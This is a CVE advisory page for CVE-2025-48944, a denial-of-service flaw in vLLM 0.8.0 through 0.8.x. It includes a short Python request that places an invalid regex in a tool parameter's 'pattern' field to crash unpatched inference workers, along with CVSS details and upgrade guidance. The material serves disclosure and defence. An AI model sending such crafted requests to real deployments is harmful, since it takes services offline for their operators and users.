CVE-2025-48944
MEDIUM 6.5
Description
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, the vLLM backend behind the OpenAI-compatible /v1/chat/completions endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are compiled or parsed without prior validation, so a single request can crash the inference worker. The worker remains down until it is restarted. Version 0.9.0 fixes the issue.
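The flaw lies in how tool definitions embedded in a chat-completions request are handled: JSON-schema fields such as "pattern" reach the regex compiler unchecked. The sketch below is a hedged illustration of the request shape involved, assuming a local vLLM server on port 8000 and a placeholder model name and tool; the concrete payload that triggers the crash is documented in the linked GitHub advisory and is not reproduced here.

# Illustrative sketch only (hypothetical host, model, and tool definition).
# On vLLM >= 0.8.0 and < 0.9.0, an invalid regex in a tool parameter's
# "pattern" field was compiled without validation, which could take down
# the inference worker until restart.
import requests

payload = {
    "model": "meta-llama/Llama-3.1-8B-Instruct",  # placeholder model name
    "messages": [{"role": "user", "content": "What is the weather in Lisbon?"}],
    "tools": [
        {
            "type": "function",
            "function": {
                "name": "get_weather",
                "parameters": {
                    "type": "object",
                    "properties": {
                        "city": {
                            "type": "string",
                            # Unbalanced parenthesis: not a valid regex, so an
                            # unpatched server may fail while compiling it.
                            "pattern": "(unclosed",
                        }
                    },
                    "required": ["city"],
                },
            },
        }
    ],
    "tool_choice": "auto",
}

resp = requests.post(
    "http://localhost:8000/v1/chat/completions",  # assumed local deployment
    json=payload,
    timeout=30,
)
print(resp.status_code, resp.text[:500])

In patched versions (0.9.0 and later) such input is rejected with an error response instead of reaching the worker; upgrading is the remediation.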
CVE Details
CVSS v3.1 Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Published: 5/30/2025
Last Modified: 7/1/2025
Source: nvd
Honeypot Sightings: 0
Affected Products
vllm:vllm
Weaknesses (CWE)
CWE-20
References
https://github.com/vllm-project/vllm/pull/17623 (security-advisories@github.com)
https://github.com/vllm-project/vllm/security/advisories/GHSA-vrq3-r879-7m65 (security-advisories@github.com)
IOC Correlations
No correlations recorded
This product uses data from the NVD API but is not endorsed or certified by the NVD.